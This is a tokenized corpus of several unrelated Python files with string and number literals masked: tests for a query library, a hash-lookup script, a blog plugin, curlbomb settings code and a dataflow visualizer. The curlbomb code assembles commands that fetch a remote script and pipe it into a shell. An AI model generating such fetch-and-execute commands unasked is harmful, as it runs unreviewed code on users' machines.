<NUM_LIT:3> ] ) <EOL> self . assertEqual ( self . manager . exclude ( a = <NUM_LIT:2> , name = '<STR_LIT>' ) , self . OBJECTS [ : <NUM_LIT:3> ] ) <EOL> self . assertEqual ( self . dict_manager . exclude ( a = <NUM_LIT:1> ) . exclude ( name = '<STR_LIT>' ) , self . DICTS [ <NUM_LIT:2> : <NUM_LIT:3> ] ) <EOL> self . assertEqual ( self . dict_manager . exclude ( a = <NUM_LIT:2> , name = '<STR_LIT>' ) , self . DICTS [ : <NUM_LIT:3> ] ) <EOL> def test_can_count ( self ) : <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . count ( ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . count ( ) , <NUM_LIT:2> ) <EOL> def test_first ( self ) : <EOL> self . assertIsNone ( self . manager . filter ( a = <NUM_LIT> ) . first ( ) ) <EOL> self . assertIsNotNone ( self . manager . filter ( a = <NUM_LIT:1> ) . first ( ) ) <EOL> self . assertIsNone ( self . dict_manager . filter ( a = <NUM_LIT> ) . first ( ) ) <EOL> self . assertIsNotNone ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . first ( ) ) <EOL> def test_ordering ( self ) : <EOL> self . assertEqual ( self . manager . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:2> ] , [ self . OBJECTS [ <NUM_LIT:2> ] , self . OBJECTS [ <NUM_LIT:0> ] ] ) <EOL> self . assertEqual ( self . manager . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:2> ] , [ self . OBJECTS [ <NUM_LIT:3> ] , self . OBJECTS [ <NUM_LIT:1> ] ] ) <EOL> self . assertEqual ( self . dict_manager . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:2> ] , [ self . DICTS [ <NUM_LIT:2> ] , self . DICTS [ <NUM_LIT:0> ] ] ) <EOL> self . assertEqual ( self . dict_manager . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:2> ] , [ self . DICTS [ <NUM_LIT:3> ] , self . DICTS [ <NUM_LIT:1> ] ] ) <EOL> @ unittest . skip ( '<STR_LIT>' ) <EOL> def test_random_ordering ( self ) : <EOL> is_py3 = sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:2> ) <EOL> random . seed ( <NUM_LIT:0> ) <EOL> random_ordered_0 = self . dict_manager . order_by ( '<STR_LIT:?>' ) [ : <NUM_LIT:2> ] <EOL> if is_py3 : <EOL> self . assertEqual ( random_ordered_0 , [ self . DICTS [ <NUM_LIT:3> ] , self . DICTS [ <NUM_LIT:1> ] ] ) <EOL> else : <EOL> self . assertEqual ( random_ordered_0 , [ self . DICTS [ <NUM_LIT:3> ] , self . DICTS [ <NUM_LIT:2> ] ] ) <EOL> random . seed ( <NUM_LIT:1> ) <EOL> random_ordered_1 = self . dict_manager . order_by ( '<STR_LIT:?>' ) [ : <NUM_LIT:2> ] <EOL> if is_py3 : <EOL> self . assertEqual ( random_ordered_1 , [ self . DICTS [ <NUM_LIT:1> ] , self . DICTS [ <NUM_LIT:2> ] ] ) <EOL> else : <EOL> self . assertEqual ( random_ordered_1 , [ self . DICTS [ <NUM_LIT:0> ] , self . DICTS [ <NUM_LIT:2> ] ] ) <EOL> self . assertNotEqual ( random_ordered_0 , random_ordered_1 ) <EOL> def test_last ( self ) : <EOL> self . assertIsNone ( self . manager . filter ( a = <NUM_LIT> ) . last ( ) ) <EOL> self . assertIsNotNone ( self . manager . filter ( a = <NUM_LIT:1> ) . last ( ) ) <EOL> self . assertIsNone ( self . dict_manager . filter ( a = <NUM_LIT> ) . last ( ) ) <EOL> self . assertIsNotNone ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . last ( ) ) <EOL> def test_exists ( self ) : <EOL> self . assertFalse ( self . manager . filter ( a = <NUM_LIT> ) . exists ( ) ) <EOL> self . assertTrue ( self . manager . filter ( a = <NUM_LIT:1> ) . exists ( ) ) <EOL> self . assertFalse ( self . dict_manager . filter ( a = <NUM_LIT> ) . exists ( ) ) <EOL> self . assertTrue ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . exists ( ) ) <EOL> def test_get_raise_exception_on_multiple_objects_returned ( self ) : <EOL> with self . assertRaises ( lifter . MultipleObjectsReturned ) : <EOL> self . manager . all ( ) . get ( a = <NUM_LIT:1> ) <EOL> with self . assertRaises ( lifter . MultipleObjectsReturned ) : <EOL> self . dict_manager . all ( ) . get ( a = <NUM_LIT:1> ) <EOL> def test_get_raise_exception_on_does_not_exist ( self ) : <EOL> with self . assertRaises ( lifter . DoesNotExist ) : <EOL> self . manager . all ( ) . get ( a = <NUM_LIT> ) <EOL> with self . assertRaises ( lifter . DoesNotExist ) : <EOL> self . dict_manager . all ( ) . get ( a = <NUM_LIT> ) <EOL> def test_can_filter_using_callable ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lambda v : v in [ <NUM_LIT:1> , <NUM_LIT:3> ] ) , [ self . OBJECTS [ <NUM_LIT:1> ] , self . OBJECTS [ <NUM_LIT:2> ] ] ) <EOL> self . assertEqual ( self . dict_manager . filter ( order = lambda v : v in [ <NUM_LIT:1> , <NUM_LIT:3> ] ) , [ self . DICTS [ <NUM_LIT:1> ] , self . DICTS [ <NUM_LIT:2> ] ] ) <EOL> def test_values ( self ) : <EOL> expected = [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT>' : <NUM_LIT:3> } , <EOL> ] <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . values ( '<STR_LIT>' ) , expected ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . values ( '<STR_LIT>' ) , expected ) <EOL> expected = [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:a>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT:a>' : <NUM_LIT:1> } , <EOL> ] <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . values ( '<STR_LIT>' , '<STR_LIT:a>' ) , expected ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . values ( '<STR_LIT>' , '<STR_LIT:a>' ) , expected ) <EOL> def test_values_list ( self ) : <EOL> expected = [ <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . values_list ( '<STR_LIT>' , flat = True ) , expected ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . values_list ( '<STR_LIT>' , flat = True ) , expected ) <EOL> expected = [ <EOL> ( <NUM_LIT:2> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:3> , <NUM_LIT:1> ) , <EOL> ] <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . values_list ( '<STR_LIT>' , '<STR_LIT:a>' ) , expected ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . values_list ( '<STR_LIT>' , '<STR_LIT:a>' ) , expected ) <EOL> def test_distinct ( self ) : <EOL> self . assertEqual ( self . manager . all ( ) . values_list ( '<STR_LIT:a>' , flat = True ) , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . manager . all ( ) . values_list ( '<STR_LIT:a>' , flat = True ) . distinct ( ) , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . manager . all ( ) . values_list ( '<STR_LIT>' , flat = True ) . distinct ( ) , self . PARENTS ) <EOL> class TestLookups ( TestBase ) : <EOL> def test_gt ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lifter . lookups . gt ( <NUM_LIT:3> ) ) , [ self . OBJECTS [ <NUM_LIT:3> ] ] ) <EOL> def test_gte ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lifter . lookups . gte ( <NUM_LIT:3> ) ) , [ self . OBJECTS [ <NUM_LIT:1> ] , self . OBJECTS [ <NUM_LIT:3> ] ] ) <EOL> def test_lt ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lifter . lookups . lt ( <NUM_LIT:3> ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:2> ] ] ) <EOL> def test_lte ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lifter . lookups . lte ( <NUM_LIT:3> ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:1> ] , self . OBJECTS [ <NUM_LIT:2> ] ] ) <EOL> def test_startswith ( self ) : <EOL> self . assertEqual ( self . manager . filter ( label = lifter . lookups . startswith ( '<STR_LIT:a>' ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:1> ] ] ) <EOL> def test_endswith ( self ) : <EOL> self . assertEqual ( self . manager . filter ( label = lifter . lookups . endswith ( '<STR_LIT:s>' ) ) , [ self . OBJECTS [ <NUM_LIT:1> ] , self . OBJECTS [ <NUM_LIT:2> ] ] ) <EOL> def test_value_in ( self ) : <EOL> self . assertEqual ( self . manager . filter ( label = lifter . lookups . value_in ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:1> ] ] ) <EOL> def test_range ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lifter . lookups . value_range ( <NUM_LIT:2> , <NUM_LIT:3> ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:1> ] ] ) <EOL> def test_istartswith ( self ) : <EOL> self . assertEqual ( self . manager . filter ( surname = lifter . lookups . istartswith ( '<STR_LIT:c>' ) ) , [ self . OBJECTS [ <NUM_LIT:1> ] , self . OBJECTS [ <NUM_LIT:3> ] ] ) <EOL> def test_iendswith ( self ) : <EOL> self . assertEqual ( self . manager . filter ( surname = lifter . lookups . iendswith ( '<STR_LIT:t>' ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:3> ] ] ) <EOL> def test_contains ( self ) : <EOL> self . assertEqual ( self . manager . filter ( surname = lifter . lookups . contains ( '<STR_LIT>' ) ) , [ self . OBJECTS [ <NUM_LIT:2> ] ] ) <EOL> def test_icontains ( self ) : <EOL> self . assertEqual ( self . manager . filter ( surname = lifter . lookups . icontains ( '<STR_LIT>' ) ) , [ self . OBJECTS [ <NUM_LIT:2> ] , self . OBJECTS [ <NUM_LIT:3> ] ] ) <EOL> class TestAggregation ( TestBase ) : <EOL> def test_sum ( self ) : <EOL> self . assertEqual ( self . manager . aggregate ( lifter . Sum ( '<STR_LIT:a>' ) ) , { '<STR_LIT>' : <NUM_LIT:6> } ) <EOL> self . assertEqual ( self . manager . aggregate ( total = lifter . Sum ( '<STR_LIT:a>' ) ) , { '<STR_LIT>' : <NUM_LIT:6> } ) <EOL> def test_min ( self ) : <EOL> self . assertEqual ( self . manager . aggregate ( lifter . Min ( '<STR_LIT:a>' ) ) , { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> def test_max ( self ) : <EOL> self . assertEqual ( self . manager . aggregate ( lifter . Max ( '<STR_LIT:a>' ) ) , { '<STR_LIT>' : <NUM_LIT:2> } ) <EOL> def test_avg ( self ) : <EOL> self . assertEqual ( self . manager . aggregate ( lifter . Avg ( '<STR_LIT:a>' ) ) , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> def test_flat ( self ) : <EOL> self . assertEqual ( self . manager . aggregate ( lifter . Avg ( '<STR_LIT:a>' ) , flat = True ) , [ <NUM_LIT> ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> sys . exit ( unittest . main ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import hashlib <EOL> import requests <EOL> def META_VT_INSPECT ( s , buff ) : <EOL> md5 = hashlib . md5 ( buff ) . hexdigest ( ) <EOL> params = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : md5 } <EOL> base_uri = '<STR_LIT>' <EOL> response = requests . get ( '<STR_LIT>' % ( base_uri , '<STR_LIT>' ) , params = params ) <EOL> response_json = response . json ( ) <EOL> return response_json <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print META_VT_INSPECT ( None , sys . stdin . read ( ) ) </s>
<s> __version__ = '<STR_LIT>' <EOL> from prophet . app import Prophet </s>
<s> import shutil <EOL> import sys <EOL> import os , os . path <EOL> import imp <EOL> import blogofile . main <EOL> from blogofile import argparse <EOL> def setup ( parent_parser , parser_template ) : <EOL> from . import __dist__ <EOL> cmd_subparsers = parent_parser . add_subparsers ( ) <EOL> command1 = cmd_subparsers . add_parser ( <EOL> "<STR_LIT>" , help = "<STR_LIT>" , parents = [ parser_template ] ) <EOL> command1 . add_argument ( "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> command1 . set_defaults ( func = do_command1 ) <EOL> command2 = cmd_subparsers . add_parser ( <EOL> "<STR_LIT>" , help = "<STR_LIT>" , parents = [ parser_template ] ) <EOL> command2 . add_argument ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> command2 . add_argument ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> nargs = "<STR_LIT:?>" , default = "<STR_LIT>" ) <EOL> command2 . set_defaults ( func = do_command2 ) <EOL> def do_command1 ( args ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> if args . extra_coolness : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> def do_command2 ( args ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" . format ( args . ARG1 ) ) <EOL> print ( "<STR_LIT>" . format ( args . ARG2 ) ) </s>
<s> import sys <EOL> import logging <EOL> import socket <EOL> import base64 <EOL> import random <EOL> import shlex <EOL> from . import run <EOL> from . import tls <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> from . argparser import argparser <EOL> def get_curlbomb_command ( settings , unwrapped = None ) : <EOL> """<STR_LIT>""" <EOL> pin_settings = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] . startswith ( "<STR_LIT>" ) and settings [ '<STR_LIT>' ] is not False and settings [ '<STR_LIT>' ] is True : <EOL> pin_settings = "<STR_LIT>" . format ( settings [ '<STR_LIT>' ] ) <EOL> if ( settings [ '<STR_LIT>' ] and unwrapped is not False ) or unwrapped is True : <EOL> knock = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] : <EOL> if settings . get ( '<STR_LIT>' , False ) : <EOL> k = "<STR_LIT>" <EOL> else : <EOL> k = settings [ '<STR_LIT>' ] <EOL> if settings [ '<STR_LIT>' ] . startswith ( "<STR_LIT>" ) : <EOL> knock = '<STR_LIT>' . format ( k ) <EOL> else : <EOL> knock = '<STR_LIT>' . format ( k ) <EOL> hostname_header = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] : <EOL> if settings [ '<STR_LIT>' ] . startswith ( "<STR_LIT>" ) : <EOL> hostname_header = '<STR_LIT>' <EOL> else : <EOL> hostname_header = '<STR_LIT>' <EOL> url = "<STR_LIT>" . format ( <EOL> ssl = "<STR_LIT:s>" if settings [ '<STR_LIT>' ] is not False else "<STR_LIT>" , <EOL> host = settings [ '<STR_LIT>' ] , <EOL> port = settings [ '<STR_LIT>' ] , <EOL> knock = knock , <EOL> hostname_header = hostname_header <EOL> ) <EOL> stream_url = "<STR_LIT>" . format ( <EOL> ssl = "<STR_LIT:s>" if settings [ '<STR_LIT>' ] is not False else "<STR_LIT>" , <EOL> host = settings [ '<STR_LIT>' ] , <EOL> port = settings [ '<STR_LIT>' ] , <EOL> knock = knock , <EOL> hostname_header = hostname_header <EOL> ) <EOL> logger = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] : <EOL> logger = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] : <EOL> callback_cmd = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] : <EOL> callback_cmd = "<STR_LIT>" + callback_cmd <EOL> else : <EOL> callback_cmd = "<STR_LIT>" . format ( cmd = callback_cmd ) <EOL> if settings [ '<STR_LIT>' ] : <EOL> callback_cmd = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> logger += callback_cmd . format ( <EOL> stream_url = stream_url , <EOL> pin_settings = pin_settings <EOL> ) <EOL> if settings [ '<STR_LIT>' ] is None or settings [ '<STR_LIT>' ] : <EOL> cmd = "<STR_LIT>" . format ( <EOL> http_fetcher = settings [ '<STR_LIT>' ] , <EOL> url = url , <EOL> pin_settings = pin_settings , <EOL> logger = logger ) <EOL> else : <EOL> cmd = "<STR_LIT>" <EOL> if not settings [ '<STR_LIT>' ] : <EOL> cmd = "<STR_LIT>" <EOL> cmd = cmd . format ( <EOL> shell_command = settings [ '<STR_LIT>' ] , <EOL> http_fetcher = settings [ '<STR_LIT>' ] , <EOL> pin_settings = pin_settings , <EOL> url = url , <EOL> logger = logger ) <EOL> return cmd <EOL> else : <EOL> if settings [ '<STR_LIT>' ] : <EOL> if settings [ '<STR_LIT>' ] : <EOL> if settings [ '<STR_LIT>' ] . startswith ( "<STR_LIT>" ) : <EOL> knock_header = '<STR_LIT>' . format ( settings [ '<STR_LIT>' ] ) <EOL> else : <EOL> knock_header = '<STR_LIT>' . format ( settings [ '<STR_LIT>' ] ) <EOL> else : <EOL> knock_header = '<STR_LIT>' <EOL> cmd = "<STR_LIT>" + knock_header <EOL> else : <EOL> cmd = "<STR_LIT>" <EOL> return cmd . format ( <EOL> http_fetcher = settings [ '<STR_LIT>' ] , <EOL> ssl = "<STR_LIT:s>" if settings [ '<STR_LIT>' ] is not False else "<STR_LIT>" , <EOL> host = settings [ '<STR_LIT>' ] , <EOL> port = settings [ '<STR_LIT>' ] , <EOL> pin_settings = pin_settings , <EOL> knock = "<STR_LIT>" . format ( <EOL> shlex . quote ( settings [ '<STR_LIT>' ] ) ) if settings [ '<STR_LIT>' ] else '<STR_LIT>' <EOL> ) <EOL> def get_settings ( args = None , override_defaults = { } ) : <EOL> """<STR_LIT>""" <EOL> parser = argparser ( ) <EOL> args = parser . parse_args ( args ) <EOL> settings = { <EOL> '<STR_LIT:args>' : args , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : args . mime_type , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : args . log_post_backs , <EOL> '<STR_LIT>' : args . ssl , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : args . pin or args . ssl is None , <EOL> '<STR_LIT>' : args . num_gets , <EOL> '<STR_LIT>' : not args . disable_knock , <EOL> '<STR_LIT>' : args . knock , <EOL> '<STR_LIT>' : args . verbose , <EOL> '<STR_LIT>' : args . survey , <EOL> '<STR_LIT>' : args . ssh , <EOL> '<STR_LIT>' : args . quiet and not args . verbose , <EOL> '<STR_LIT>' : args . client_logging , <EOL> '<STR_LIT>' : args . client_quiet , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : args . wget , <EOL> '<STR_LIT>' : args . unwrapped , <EOL> '<STR_LIT>' : sys . stdin , <EOL> '<STR_LIT>' : sys . stdout , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : get_curlbomb_command <EOL> } <EOL> settings . update ( override_defaults ) <EOL> if args . verbose : <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . INFO ) <EOL> settings [ '<STR_LIT>' ] = True <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . INFO ) <EOL> if args . debug : <EOL> settings [ '<STR_LIT>' ] = True <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . DEBUG ) <EOL> settings [ '<STR_LIT>' ] = True <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . DEBUG ) <EOL> if settings [ '<STR_LIT>' ] and not settings [ '<STR_LIT>' ] : <EOL> settings [ '<STR_LIT>' ] = base64 . b64encode ( bytes ( random . sample ( range ( <NUM_LIT> ) , <NUM_LIT:12> ) ) , <EOL> altchars = b'<STR_LIT>' ) . decode ( "<STR_LIT:utf-8>" ) <EOL> if settings [ '<STR_LIT>' ] : <EOL> settings [ '<STR_LIT>' ] = False <EOL> settings [ '<STR_LIT>' ] = False <EOL> if args . disable_postback : <EOL> settings [ '<STR_LIT>' ] = False <EOL> if settings [ '<STR_LIT>' ] : <EOL> settings [ '<STR_LIT>' ] = False <EOL> if args . pin and args . ssl is False : <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args . wget : <EOL> settings [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> if args . log_post_backs : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args . pin : <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args . port == "<STR_LIT>" : <EOL> s = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> s . bind ( ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> settings [ '<STR_LIT:port>' ] = s . getsockname ( ) [ <NUM_LIT:1> ] <EOL> s . close ( ) <EOL> else : <EOL> settings [ '<STR_LIT:port>' ] = int ( args . port ) <EOL> settings [ '<STR_LIT>' ] = socket . gethostbyname ( socket . gethostname ( ) ) <EOL> settings [ '<STR_LIT>' ] = settings [ '<STR_LIT:port>' ] <EOL> if settings [ '<STR_LIT>' ] : <EOL> ssh_parts = settings [ '<STR_LIT>' ] . split ( "<STR_LIT::>" ) <EOL> ssh_host = ssh_parts [ <NUM_LIT:0> ] <EOL> ssh_port = <NUM_LIT> <EOL> http_port = settings [ '<STR_LIT:port>' ] <EOL> if len ( ssh_parts ) == <NUM_LIT:3> : <EOL> ssh_port = ssh_parts [ <NUM_LIT:1> ] <EOL> http_port = ssh_parts [ <NUM_LIT:2> ] <EOL> elif len ( ssh_parts ) == <NUM_LIT:2> : <EOL> http_port = ssh_parts [ <NUM_LIT:1> ] <EOL> settings [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> port = settings [ '<STR_LIT:port>' ] , http_port = http_port ) <EOL> settings [ '<STR_LIT>' ] = ssh_host <EOL> settings [ '<STR_LIT>' ] = ssh_port <EOL> settings [ '<STR_LIT>' ] = http_port <EOL> if '<STR_LIT:@>' in ssh_host : <EOL> settings [ '<STR_LIT>' ] , settings [ '<STR_LIT>' ] = ssh_host . split ( '<STR_LIT:@>' ) <EOL> else : <EOL> settings [ '<STR_LIT>' ] = ssh_host <EOL> if args . domain : <EOL> parts = args . domain . split ( "<STR_LIT::>" ) <EOL> settings [ '<STR_LIT>' ] = parts [ <NUM_LIT:0> ] <EOL> if len ( parts ) > <NUM_LIT:1> : <EOL> settings [ '<STR_LIT>' ] = parts [ <NUM_LIT:1> ] <EOL> if settings [ '<STR_LIT>' ] is not False : <EOL> settings [ '<STR_LIT>' ] = tls . get_ssl_context_from_settings ( settings ) <EOL> if not settings [ '<STR_LIT>' ] . isatty ( ) and not settings [ '<STR_LIT>' ] : <EOL> settings [ '<STR_LIT>' ] = True <EOL> try : <EOL> prepare_cmd = args . prepare_command <EOL> except AttributeError : <EOL> args . command = None <EOL> args . script_hash = None <EOL> args . signature = None <EOL> args . resource = settings [ '<STR_LIT>' ] <EOL> prepare_cmd = run . prepare <EOL> prepare_cmd ( args , settings , parser ) <EOL> return settings </s>
<s> import sys <EOL> import textwrap <EOL> import argparse <EOL> from calvin . actorstore . store import DocumentationStore <EOL> from calvin . Tools import cscompiler <EOL> from calvin . csparser . parser import calvin_parser <EOL> def _refname ( name ) : <EOL> return "<STR_LIT>" if name == '<STR_LIT:.>' else name . replace ( '<STR_LIT::>' , '<STR_LIT:_>' ) <EOL> class Viz ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( Viz , self ) . __init__ ( ) <EOL> def __str__ ( self ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def render ( self ) : <EOL> return str ( self ) <EOL> class LinkViz ( Viz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , link ) : <EOL> super ( LinkViz , self ) . __init__ ( ) <EOL> link [ '<STR_LIT:src>' ] = _refname ( link [ '<STR_LIT:src>' ] ) <EOL> link [ '<STR_LIT>' ] = _refname ( link [ '<STR_LIT>' ] ) <EOL> self . link = link <EOL> def __str__ ( self ) : <EOL> if not self . link [ '<STR_LIT:src>' ] : <EOL> return '<STR_LIT>' . format ( ** self . link ) <EOL> elif not self . link [ '<STR_LIT>' ] : <EOL> return '<STR_LIT>' . format ( ** self . link ) <EOL> else : <EOL> return '<STR_LIT>' . format ( ** self . link ) <EOL> class ActorViz ( Viz ) : <EOL> """<STR_LIT>""" <EOL> docstore = DocumentationStore ( ) <EOL> def __init__ ( self , name , actor_type , args , ** dummy ) : <EOL> super ( ActorViz , self ) . __init__ ( ) <EOL> self . type_color = '<STR_LIT>' <EOL> self . name = name <EOL> self . args = args <EOL> self . actor_type = actor_type <EOL> doc = self . docstore . help_raw ( actor_type ) <EOL> self . set_ports ( doc ) <EOL> def set_ports ( self , doc ) : <EOL> inports = [ p for p , _ in doc [ '<STR_LIT>' ] ] <EOL> outports = [ p for p , _ in doc [ '<STR_LIT>' ] ] <EOL> inlen = len ( inports ) <EOL> outlen = len ( outports ) <EOL> self . portrows = max ( inlen , outlen ) <EOL> self . inports = inports + [ '<STR_LIT>' ] * ( self . portrows - inlen ) <EOL> self . outports = outports + [ '<STR_LIT>' ] * ( self . portrows - outlen ) <EOL> def __str__ ( self ) : <EOL> lines = [ ] <EOL> lines . append ( '<STR_LIT>' . format ( _refname ( self . name ) ) ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> lines . append ( '<STR_LIT>' . format ( self . name , self . type_color ) ) <EOL> lines . append ( '<STR_LIT>' . format ( self . actor_type ) ) <EOL> is_first = True <EOL> for inport , outport in zip ( self . inports , self . outports ) : <EOL> inref = '<STR_LIT>' . format ( inport ) if inport else '<STR_LIT>' <EOL> outref = '<STR_LIT>' . format ( outport ) if outport else '<STR_LIT>' <EOL> if is_first : <EOL> is_first = False <EOL> middle = '<STR_LIT>' . format ( self . portrows ) <EOL> else : <EOL> middle = '<STR_LIT>' <EOL> lines . append ( '<STR_LIT>' . format ( inref , inport , outref , outport , middle ) ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT:\n>' . join ( lines ) <EOL> class PadViz ( Viz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , padname , direction ) : <EOL> super ( PadViz , self ) . __init__ ( ) <EOL> self . padname = padname <EOL> self . direction = direction <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . padname , self . direction ) <EOL> class CompViz ( ActorViz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , comp_type , comp_def ) : <EOL> self . type_color = '<STR_LIT>' <EOL> self . name = name <EOL> self . args = comp_def [ '<STR_LIT>' ] <EOL> self . actor_type = comp_type <EOL> doc = self . docstore . component_docs ( '<STR_LIT:.>' + comp_type , comp_def ) <EOL> self . set_ports ( doc ) <EOL> class AppViz ( Viz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , deployable ) : <EOL> super ( AppViz , self ) . __init__ ( ) <EOL> self . actors = [ ActorViz ( name , ** args ) for name , args in deployable [ '<STR_LIT>' ] . iteritems ( ) ] <EOL> self . links = [ ] <EOL> for src , dstlist in deployable [ '<STR_LIT>' ] . iteritems ( ) : <EOL> _src , _src_port = src . split ( '<STR_LIT:.>' ) <EOL> for dst in dstlist : <EOL> _dst , _dst_port = dst . split ( '<STR_LIT:.>' ) <EOL> link = { '<STR_LIT:src>' : _src , '<STR_LIT>' : _src_port , '<STR_LIT>' : _dst , '<STR_LIT>' : _dst_port } <EOL> self . links . append ( LinkViz ( link ) ) <EOL> self . components = [ ] <EOL> def __str__ ( self ) : <EOL> viz = [ str ( v ) for v in self . actors + self . links + self . components ] <EOL> return '<STR_LIT:\n>' . join ( viz ) <EOL> def render ( self ) : <EOL> return '<STR_LIT>' . format ( str ( self ) ) <EOL> class ScriptViz ( AppViz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ir ) : <EOL> comp_defs = ir [ '<STR_LIT>' ] if '<STR_LIT>' in ir else { } <EOL> self . actors = [ ActorViz ( name , ** args ) for name , args in ir [ '<STR_LIT>' ] [ '<STR_LIT>' ] . iteritems ( ) if '<STR_LIT:.>' in args [ '<STR_LIT>' ] ] <EOL> self . links = [ LinkViz ( link ) for link in ir [ '<STR_LIT>' ] [ '<STR_LIT>' ] if link [ '<STR_LIT:src>' ] and link [ '<STR_LIT>' ] ] <EOL> self . components = [ CompViz ( name , args [ '<STR_LIT>' ] , comp_defs [ args [ '<STR_LIT>' ] ] ) for name , args in ir [ '<STR_LIT>' ] [ '<STR_LIT>' ] . iteritems ( ) if args [ '<STR_LIT>' ] in comp_defs ] <EOL> class CompInternalsViz ( ScriptViz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , comp_def ) : <EOL> super ( CompInternalsViz , self ) . __init__ ( comp_def ) <EOL> self . name = comp_def [ '<STR_LIT:name>' ] <EOL> self . inpads = [ 